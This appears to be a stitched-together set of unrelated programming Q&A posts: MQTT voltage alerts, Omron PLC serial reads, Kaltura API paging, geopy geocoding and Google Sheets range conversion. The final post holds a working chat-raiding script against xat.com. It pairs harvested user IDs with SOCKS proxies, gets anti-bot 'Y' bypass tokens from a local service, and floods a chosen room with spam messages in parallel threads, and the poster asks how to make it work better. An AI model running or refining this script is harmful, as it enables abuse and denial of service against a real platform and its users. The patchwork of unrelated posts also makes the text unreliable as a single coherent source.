I have the following code that I've been asked to 'tidy up'. At the moment I don't think it's optimal, so I'd like some advice on how to improve it, please.
I have 4 voltages received as MQTT messages (power1, power2, etc.), corresponding to 4 different measuring stations; each value is appended to a new array 'power'. If a value lies between 'Vlow' and 'Vtrig', it is appended to another array 'flags'; when the length of 'flags' exceeds a certain value (Flag_length), a flag is triggered that I can send out as an MQTT message, so that I'm notified if I get multiple values outside the required range. Otherwise, the array is emptied and we start again.
Here's what I wrote so far:
import smbus
import time
import csv
from datetime import datetime
import paho.mqtt.client as paho
MQTT_HOST = '10.10.20.122'
MQTT_PORT = 1883
MQTT_CLIENT_ID = 'lowerStation'
TOPIC = 'pwrTest/testData'
TOPIC_TOM = 'pwrTest/Error'
TOPICeval = 'pwrTest/testEval'
Vtrig = 12
Vlow = 0.1
Flag_length = 7
flags0=[]
flags1=[]
flags2=[]
flags3=[]
client = paho.Client(MQTT_CLIENT_ID)
client.connect(MQTT_HOST, MQTT_PORT)
# Serial numbers of the Volito connected to each measuring station, stations 1 to 4
SN = [109, 78, 86, 60]
def on_connect(client, userdata, flags, rc):
    if rc == 0:
        print('connected')
    else:
        print('Bad connection code =', rc)
broker = '10.10.20.122'
client.connect(broker) #connect to broker
client.on_connect = on_connect #bind call back function
print('Connecting to broker', broker)
But this is really the relevant part.
payload = str(power1) + "," + "Station1," + "SN" +str(SN[0])
client.publish(TOPIC, payload)
payload = str(power2) + "," + "Station2," + "SN" +str(SN[1])
client.publish(TOPIC, payload)
payload = str(power3) + "," + "Station3," + "SN" +str(SN[2])
client.publish(TOPIC, payload)
payload = str(power4) + "," + "Station4," + "SN" +str(SN[3])
client.publish(TOPIC, payload)
power = []
power.append(datetime.now().strftime("%d/%m/%Y %H:%M:%S"))
power.append(power1)
power.append(power2)
power.append(power3)
power.append(power4)
for x in power[1:2]:
    if x < Vtrig and x > Vlow:
        flags0.append(x)
    elif x >= Vtrig:
        flags0 = []
    if len(flags0) > Flag_length:
        payload = '5.0,' + "Station1," + "SN" + str(SN[0])
        flags0 = []
        client.publish(TOPICeval, payload)
for x in power[2:3]:
    if x < Vtrig and x > Vlow:
        flags1.append(x)
    elif x >= Vtrig:
        flags1 = []
    if len(flags1) > Flag_length:
        payload = '5.0,' + "Station2," + "SN" + str(SN[1])
        flags1 = []
        client.publish(TOPICeval, payload)
for x in power[3:4]:
    if x < Vtrig and x > Vlow:
        flags2.append(x)
    elif x >= Vtrig:
        flags2 = []
    if len(flags2) > Flag_length:
        payload = '5.0,' + "Station3," + "SN" + str(SN[2])
        flags2 = []
        client.publish(TOPICeval, payload)
for x in power[4:5]:
    if x < Vtrig and x > Vlow:
        flags3.append(x)
    elif x >= Vtrig:
        flags3 = []
    if len(flags3) > Flag_length:
        payload = '5.0,' + "Station4," + "SN" + str(SN[3])
        flags3 = []
        client.publish(TOPICeval, payload)
print('running')
time.sleep(10)
As you can see, I repeat the same code for each entry; is there a better way of writing this with a for loop?
Nice spot on the simplification. I think you could do it like this.
Even better, you should probably start using functions, or debugging your code will be a nightmare in the future.
buffer = {}  # a dict keyed by station index, but there are probably other ways to do it
for index, value in enumerate(power[1:]):  # skip the timestamp at power[0]
    if value < Vtrig and value > Vlow:  # your conditional checks
        buffer.setdefault(index, []).append(value)  # append to this station's flag list
    elif value >= Vtrig:  # conditional checks
        buffer[index] = []  # clearing the 'flag' list for this station
    if len(buffer.get(index, [])) > Flag_length:  # your conditional check
        payload = '5.0, Station{}, SN{}'.format(index + 1, SN[index])
        # index starts from 0, so + 1 gives the station number
        buffer[index] = []  # clearing again
        client.publish(TOPICeval, payload)  # publishing whatever you wanted
On another note, consider creating a class and splitting the logic into functions. It would make your code much more readable.
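Just to illustrate, here's a minimal sketch of what a function-based version could look like, reusing your Vtrig, Vlow, Flag_length, SN, client and TOPICeval names (check_station and flag_buffers are illustrative names of mine, not from your code):
flag_buffers = {i: [] for i in range(len(SN))}  # one flag list per station

def check_station(index, value):
    """Track one station's reading; publish an alert if too many stay out of range."""
    if Vlow < value < Vtrig:
        flag_buffers[index].append(value)
    elif value >= Vtrig:
        flag_buffers[index] = []
    if len(flag_buffers[index]) > Flag_length:
        payload = '5.0,Station{},SN{}'.format(index + 1, SN[index])
        flag_buffers[index] = []
        client.publish(TOPICeval, payload)

# then, each time a new set of readings arrives:
for station_index, reading in enumerate([power1, power2, power3, power4]):
    check_station(station_index, reading)
That keeps the per-station state in one place and makes the threshold logic testable on its own.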
I have two PLCs with serial ports: one is a Mitsubishi Q00JCPU using the MC protocol, the other is an Omron using the Host Link protocol.
I tried to use the Python pyserial library to write to the PLC and read the response, but it failed. When I tested with a serial tool instead, I got a good response: the tool communicated with the PLC successfully, and reading CIO address 100 with size 2 returned 12345678, which is the correct result.
My code:
import serial
omr = serial.Serial(port='COM4', baudrate=9600, timeout=0.5)
omr.parity=serial.PARITY_EVEN
omr.bytesize = 7
omr.stopbits =2
resp = omr.write(b'\x40\x30\x30\x46\x41\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x31\x42\x30\x30\x30\x36\x34\x30\x30\x30\x30\x30\x32\x30\x35\x2a\x0d')
print(resp) # print 34
resp = omr.write(b'#00FA0000000000101B0006400000205*\CR')
print(resp) # print 36
It seems to return the length of the written data. I tried both hex and ASCII; both failed.
I figured it out: the return value of serial.write() is not the device's response. If you need the response from the device, you should use read_until(). I'm not sure whether this is a good way, so please let me know if you have any suggestions.
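For reference, the minimal pattern is just this (frame here is only a placeholder for the complete Host Link command, FCS and '*' + CR terminator included, not a new command):
import serial

omr = serial.Serial(port='COM4', baudrate=9600, timeout=0.5,
                    parity=serial.PARITY_EVEN, bytesize=serial.SEVENBITS,
                    stopbits=serial.STOPBITS_TWO)

frame = b'...'                  # your complete Host Link command string
count = omr.write(frame)        # write() only reports how many bytes were sent
resp = omr.read_until(b'\r')    # the PLC's actual reply, read up to the CR terminator
print(count, resp)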
Anyway, the class I made can read the Omron PLC given different parameters; I hope it can help someone.
DEMO:
import serial
# cmd = '0101B00064000001'
class OMR_SERIAL_TOOL:
    def __init__(self, port, baudrate):
        self.omr = serial.Serial(port=port, baudrate=baudrate, timeout=0.5)
        self.omr.parity = serial.PARITY_EVEN
        self.omr.bytesize = 7
        self.omr.stopbits = 2
        self.head = '#00FA000000000'

    @staticmethod
    def get_xor(frame):
        res = ord(frame[0])
        for i in frame[1:]:
            res ^= ord(i)
        res = str(res)
        if len(res) == 1:
            res = '0' + res
        return res

    def omr_read(self, head, cmd):
        xor = OMR_SERIAL_TOOL.get_xor(head + cmd)
        self.omr.write('{}{}{}*\r'.format(head, cmd, xor).encode())
        resp = self.omr.read_until("\r".encode())
        return str(resp[23:-4], encoding='utf-8')

test = OMR_SERIAL_TOOL('COM4', 9600)
res = test.omr_read(test.head, cmd='0101B00064000002')
print(res)  # 12345678, which is the correct response
BOOM! VERSION 1.0
import serial

class OMR_SERIAL_TOOL:
    def __init__(self, port, baudrate, mode):
        self.omr = serial.Serial(port=port, baudrate=baudrate, timeout=0.5)
        self.omr.parity = serial.PARITY_EVEN
        self.omr.bytesize = 7
        self.omr.stopbits = 2
        # fins mode
        if mode == 'fins':
            self.head = '#00FA000000000'
            self.cmd_map = {
                "MEMORY_AREA_READ": "0101",
                "MEMORY_AREA_WRITE": "0102",
                "MEMORY_AREA_FILL": "0103",
                "MULTI_MEMORY_AREA_READ": "0104",
                "MEMORY_AREA_TRANSFER": "0105"
            }
            # cs/cj mode
            self.io_memory_area_code_map = {
                "CIO_bit": "30",
                "WR_bit": "31",
                "HR_bit": "32",
                "AR_bit": "33",
                "CIO_word": "B0",
                "WR_word": "B1",
                "HR_word": "B2",
                "AR_word": "B3"
            }

    @staticmethod
    def get_xor(frame):
        res = ord(frame[0])
        for i in frame[1:]:
            res ^= ord(i)
        res = str(res)
        if len(res) == 1:
            res = '0' + res
        res = str(hex(int(res)))[2:]
        upcase_res = ''
        for i in res:
            if i.isdigit():
                upcase_res += i
            elif i.isalpha():
                upcase_res += i.upper()
        if len(upcase_res) == 1:
            upcase_res = '0' + upcase_res
        return upcase_res

    def omr_read(self, cmd, code, address, size):
        address = str(hex(address))[2:]
        size = str(hex(size))[2:]
        while len(address) < 4:
            address = '0' + address
        while len(size) < 4:
            size = '0' + size
        frame = self.head + cmd + code + address + '00' + size
        xor = OMR_SERIAL_TOOL.get_xor(frame)
        # print(frame + xor)
        self.omr.write('{}{}*\r'.format(frame, xor).encode())
        resp = self.omr.read_until("\r".encode())
        return str(resp[23:-4], encoding='utf-8')

omr_client = OMR_SERIAL_TOOL('COM4', 9600, 'fins')
cmd = omr_client.cmd_map['MEMORY_AREA_READ']
code = omr_client.io_memory_area_code_map['CIO_word']
res = omr_client.omr_read(cmd, code, address=500, size=1)
I tested it successfully on CIO reads; please let me know if you find any bugs.
I'm unable to generate all entries in Kaltura. An ApiException with the message "Unable to generate list. max matches value was reached" (Error: QUERY_EXCEEDED_MAX_MATCHES_ALLOWED) gets triggered.
I tried to work around this issue by setting my sessionPrivileges to disableentitlement:
class class_chk_integrity():
    client = None
    pagesize = 0

    def __init__(self, worker_num, progress):
        self.pagesize = 30
        self.worker_num = worker_num
        self.progress = progress
        config = KalturaConfiguration(2723521)
        config.serviceUrl = "https://www.kaltura.com/"
        self.client = KalturaClient(config)
        ks = self.client.session.start("KALTURA_ADMIN_SECRET",
                                       "email#email.com",
                                       KalturaPluginsCore.KalturaSessionType.ADMIN,
                                       "KALTURA_PARTNER_ID",
                                       432000,
                                       "disableentitlement")
        self.client.setKs(ks)
I also tried to filter based on the IDs. However, I can't manage to get filter.idNotIn to work properly.
def get_total_reg(self, cont, lastEntryIds, lastEntryCreatedAt):
    filter = KalturaPluginsCore.KalturaBaseEntryFilter()
    if lastEntryIds != "":
        filter.idNotIn = lastEntryIds
    filter.orderBy = KalturaBaseEntryOrderBy.CREATED_AT_DESC
    pager = KalturaPluginsCore.KalturaFilterPager()
    pageIndex = 1
    entriesGot = 0
    pager.pageSize = self.pagesize
    pager.setPageIndex = pageIndex
    result = self.client.baseEntry.list(filter, pager)
    totalCount = result.totalCount
    if totalCount > 10000:
        totalCount = 9970
    if totalCount <= 0:
        cont = False
    while entriesGot < totalCount:
        pager.pageSize = self.pagesize
        pageIndex += 1
        pager.pageIndex = pageIndex
        result = self.client.baseEntry.list(filter, pager)
        entriesGot += len(result.objects)
        for e in result.objects:
            if lastEntryIds == "":
                lastEntryIds.append(e.id)
            else:
                lastEntryIds.append(e.id)
            lastEntryCreatedAt = e.createdAt
    return result.totalCount, self.pagesize, cont, lastEntryIds, lastEntryCreatedAt
This is how I'm calling the functions:
if __name__ == '__main__':
    try:
        log = _ServiceUtils.log()
        log.setup('all', 'integrity')
        cont = True
        lastEntryIds = []
        lastEntryCreatedAt = 0
        while cont is True:
            kmc = class_chk_integrity(0, 0)
            kmc_total_reg, kmc_page_size, cont, lastEntryIds, lastEntryCreatedAt = kmc.get_total_reg(cont, lastEntryIds, lastEntryCreatedAt)
            interval = 10
            max_threads = math.ceil(kmc_total_reg / (interval * kmc_page_size))
            # max_threads = 1
            threads_list = []
            print('TOTAL REG : %s | PAGE_SIZE : %s | INTERVAL : %s | THREADS : %s' % (kmc_total_reg, kmc_page_size, interval, max_threads))
            progress = class_progress_thread(max_threads)
            for index in range(0, max_threads):
                page_ini = index * interval
                page_end = index * interval + interval
                progress.add_worker_progress(index, datetime.now())
                threads_list.append(threading.Thread(target=thread_chk_integrity, args=(index, log, index * interval + 1, index * interval + interval, progress)))
            threads_list.append(threading.Thread(target=thread_output_progress, args=(progress, max_threads)))
            for thread in threads_list:
                thread.start()
            for thread in threads_list:
                thread.join()
            while not progress.stop():
                time.sleep(30)
    except KeyboardInterrupt:
        try:
            sys.exit(0)
        except SystemExit:
            os._exit(0)
I'd appreciate any help with this.
Thank you for your attention.
if totalCount > 10000:
    totalCount = 9970
I'm curious to know why you are changing the totalCount this way.
Short answer - paging works as long as the result set is up to 10K.
To work around that, sort the result by creation date (as you did), and when you get to 10K, start with a new search where the created_at date in the filter is the last value you got in the previous search. Reset your paging of course.
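A rough sketch of that idea, reusing the objects from your code and assuming the base entry filter exposes a createdAtLessThanOrEqual field (check the exact field name in your client version):
filter = KalturaPluginsCore.KalturaBaseEntryFilter()
filter.orderBy = KalturaBaseEntryOrderBy.CREATED_AT_DESC
pager = KalturaPluginsCore.KalturaFilterPager()
pager.pageSize = 500

lastCreatedAt = None
done = False
while not done:
    if lastCreatedAt is not None:
        # open a new 10K window below the last timestamp we reached
        filter.createdAtLessThanOrEqual = lastCreatedAt
    pager.pageIndex = 1
    while True:
        result = self.client.baseEntry.list(filter, pager)
        if not result.objects:
            done = True          # nothing left anywhere, stop completely
            break
        for e in result.objects:
            lastCreatedAt = e.createdAt
            # ... process e ...
        if pager.pageIndex * pager.pageSize >= 10000:
            break                # about to hit the 10K ceiling, restart the window
        pager.pageIndex += 1
Entries that share the boundary timestamp will come back again at the start of the next window, so de-duplicate them by entry id.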
I have a list of addresses, and I just wind up getting a Killed: 9 error when I try to add coordinates.
Is it timing out? I added sleep times to try to prevent that.
The error I get is: Killed: 9
import time
from geopy.geocoders import Nominatim
from geopy.exc import GeocoderTimedOut

def do_geocode(Nominatim, address):
    time.sleep(3)
    try:
        return Nominatim.geocode(address)
    except GeocoderTimedOut:
        return do_geocode(Nominatim, address)

def addCoordinates(businessList):
    businessList[0] = ["pageNum", "entryNum", "name", "address", "tagOne", "tagTwo", "tagThree", "geoAddress", "appendedLocation", "latitude", "longitude", "key"]
    geolocator = Nominatim(timeout=None)
    z = 0
    i = 1
    while i < len(businessList):
        longitude = ""
        latitude = ""
        geoLocation = ""
        geoAddress = ""
        entry = []
        appendedLocation = (businessList[i][3] + ", San Francisco")
        geoLocation = do_geocode(geolocator, appendedLocation)
        if geoLocation is not None:
            geoAddress = geoLocation.address
            latitude = geoLocation.latitude
            longitude = geoLocation.longitude
        entry = [geoAddress, appendedLocation, str(latitude), str(longitude)]
        j = 0
        while j < len(entry):
            businessList[i] += [entry[j]]
            j += 1
        print("coordinates added")
        z += 1
        print(z)
        i += 1
Killed: 9 probably means that your Python script has been terminated by something in your OS (perhaps the OOM killer?). Make sure your script doesn't consume all of the machine's available memory.
For geopy specifically I'd suggest taking a look at the RateLimiter class. Also note that you need to specify a unique User Agent when using Nominatim (which is explained in the Nominatim class docs). You'd get something like this:
from geopy.geocoders import Nominatim
from geopy.extra.rate_limiter import RateLimiter

def addCoordinates(businessList):
    businessList[0] = ["pageNum", "entryNum", "name", "address", "tagOne", "tagTwo", "tagThree", "geoAddress", "appendedLocation", "latitude", "longitude", "key"]
    geolocator = Nominatim(user_agent="specify_your_app_name_here", timeout=20)
    geocode = RateLimiter(
        geolocator.geocode,
        min_delay_seconds=3.0,
        error_wait_seconds=3.0,
        swallow_exceptions=False,
        max_retries=10,
    )
    z = 0
    i = 1
    while i < len(businessList):
        longitude = ""
        latitude = ""
        geoLocation = ""
        geoAddress = ""
        entry = []
        appendedLocation = (businessList[i][3] + ", San Francisco")
        geoLocation = geocode(appendedLocation)
        if geoLocation is not None:
            geoAddress = geoLocation.address
            latitude = geoLocation.latitude
            longitude = geoLocation.longitude
        entry = [geoAddress, appendedLocation, str(latitude), str(longitude)]
        j = 0
        while j < len(entry):
            businessList[i] += [entry[j]]
            j += 1
        print("coordinates added")
        z += 1
        print(z)
        i += 1
Through this code I've updated a bunch of rows in a Google Spreadsheet.
The request goes well and returns an updatedRange, which I extract below.
result = service.spreadsheets().values().append(
    spreadsheetId=spreadsheetId,
    range=rangeName,
    valueInputOption="RAW",
    insertDataOption="INSERT_ROWS",
    body=body
).execute()
print(result)
print("Range updated")
updateRange = result['updates']['updatedRange']
Now I would like to do a batchUpdate request to set formatting or a protected range, but those APIs require a range specified as startRowIndex, endRowIndex, and so on.
How can I retrieve the row and column indexes from the updatedRange?
Waiting for a native or better answer, I'll post a function I've created to translate a namedRange into a gridRange.
The function is far from perfect and does not translate the sheet name to a sheet id (I left that task to another specific function), but it accepts named ranges in the form:
sheet!A:B
sheet!A1:B
sheet!A:B5
sheet!A1:B5
Here is the code
import re

def namedRange2Grid(self, rangeName):
    ascii_uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    match = re.match(r".*?!([A-Z0-9]+):([A-Z0-9]+)", rangeName)
    if match:
        start = match.group(1)
        end = match.group(2)
        matchStart = re.match(r"([A-Z]+)([0-9]+)?", start)
        matchEnd = re.match(r"([A-Z]+)([0-9]+)?", end)
        if matchStart and matchEnd:
            GridRange = {}
            letterStart = matchStart.group(1)
            letterEnd = matchEnd.group(1)
            if matchStart.group(2):
                numberStart = int(matchStart.group(2))
                GridRange['startRowIndex'] = numberStart - 1
            if matchEnd.group(2):
                numberEnd = int(matchEnd.group(2))
                GridRange['endRowIndex'] = numberEnd
            # column letters are base-26 digits: 'A' -> 0, 'Z' -> 25, 'AA' -> 26, ...
            i = 0
            for c in letterStart:
                i = i * 26 + ascii_uppercase.index(c) + 1
            GridRange['startColumnIndex'] = i - 1
            i = 0
            for c in letterEnd:
                i = i * 26 + ascii_uppercase.index(c) + 1
            GridRange['endColumnIndex'] = i  # end index is exclusive
            return GridRange
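As a quick check, feeding it an updatedRange like the one the append call returns (here 'Sheet1!A5:D8' is just an example value) gives:
# self is unused, so None is enough for a standalone test
grid = namedRange2Grid(None, 'Sheet1!A5:D8')
print(grid)
# {'startRowIndex': 4, 'endRowIndex': 8, 'startColumnIndex': 0, 'endColumnIndex': 4}
The numeric sheetId still has to be added separately before using this in a batchUpdate request.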
See the code below, "j2".
In the j2 XML, as you can see, Y = getY is evaluated for each id+proxy pair (one per thread).
What I want is for it to keep changing id and k2, but to reuse the same Y for only 3 of them; after that, it should fetch a new Y and do the same again.
So, for example:
<j2 Y="one value" id="3 threads pass through" k="3 threads">
and then after that:
<j2 Y="new Y value, because only 3 ids can pass through one Y" id="same again" k="same again">
j2 = str('<j2 cb="'+rcv.attrib["c"]+'" Y="'+str(Y[0])+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
The Y value should stay the same while 3 ids pass through it; then, once 3 have passed through, grab a new Y value.
Take a look at this script:
import socket, socks
import xml.etree.ElementTree as tree
import time, random, urllib2
import threading
from itertools import izip
def gB(data,first,last):
x=len(first)
begin = data.find(first) + x
end = data.find(last,begin)
return data[begin:end]
def isInt(buf):
try:
i = int(buf)
return True
except:
return False
def ip(roomname):
if isInt(roomname):
room = roomname
else:
room = gB(urllib2.urlopen('http://xat.com/'+roomname).read(),'FlashVars="id=','&xc=')
room = int(room)
x = urllib2.urlopen('http://xat.com/web_gear/chat/ip.htm?'+str(time.time())).read()
x = tree.fromstring(x)
xSock = x.attrib['xSock'].split(',')
rSock = []
while len(rSock) < 4:
rSock.append(xSock[len(rSock) * 4 + random.randint(0,1)])
return rSock[(room & 96) >> 5],int(10007 + (room % 32)),room
def parseID(auser3):
auser3 = auser3.split('&')
userid = auser3[1].split('=')[1]
k1 = auser3[2].split('=')[1]
k2 = auser3[3].split('=')[1]
return [userid,k1,k2]
def getY(au, p0, p1, p2, p3, yi):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.settimeout(10)
sock.connect(("127.0.0.1",1337))
sock.send(au+"_"+p0+"_"+p1+"_"+p2+"_"+p3+"_"+yi)
data = sock.recv(1270)
parse = data.split("\"")
sock.close()
print "Y => "+parse[1]+" L5 => "+parse[3]
return [parse[1], parse[3]]
def raider(a3,p):
info = ip(chat)
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, p[0], int(p[1]))
socket.test = socks.socksocket
xat = socket.test(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
xat.settimeout(10)
xat.connect((info[0],int(info[1])))
xat.send('<y r="'+str(info[2])+'" />\0')
bypass = xat.recv(1024)
print "\nRecv --> "+bypass+"\n"
rcv = tree.fromstring(bypass.strip("\0"))
if 'i' not in rcv.attrib:
raise Exception("YUP")
import pprint
pprint.pprint(a3)
uid = a3[0]
k = a3[1]
if 'au' in rcv.attrib:
Y = getY(rcv.attrib["au"], rcv.attrib["p"].split("_")[0],rcv.attrib["p"].split("_")[1],rcv.attrib["p"].split("_")[2],rcv.attrib["p"].split("_")[3], rcv.attrib["i"])
j2 = str('<j2 cb="'+rcv.attrib["c"]+'" Y="'+str(Y[0])+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
xat.send(j2)
print "\nSend [Bypass] --> "+j2+"\n"
else:
Y = getY(str(0), rcv.attrib["p"].split("_")[0],rcv.attrib["p"].split("_")[1],rcv.attrib["p"].split("_")[2],rcv.attrib["p"].split("_")[3], rcv.attrib["i"])
j2 = str('<j2 cb="'+rcv.attrib["c"]+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
xat.send(j2)
print "\nSend --> "+j2+"\n"
while 1:
time.sleep(1)
xat.send('<m t=" | XAT IS CORRUPT | " u="'+uid+'" />\0')
except:
pass
chat = raw_input("Chat to raid: ")
ids = [i.strip() for i in open('ids.txt','r')]
proxies = [i.strip() for i in open('socks.txt','r')]
for (i,j) in izip(ids,proxies):
i = parseID(i)
j = j.split(':')
threading.Thread(target=raider,args=(i,j)).start()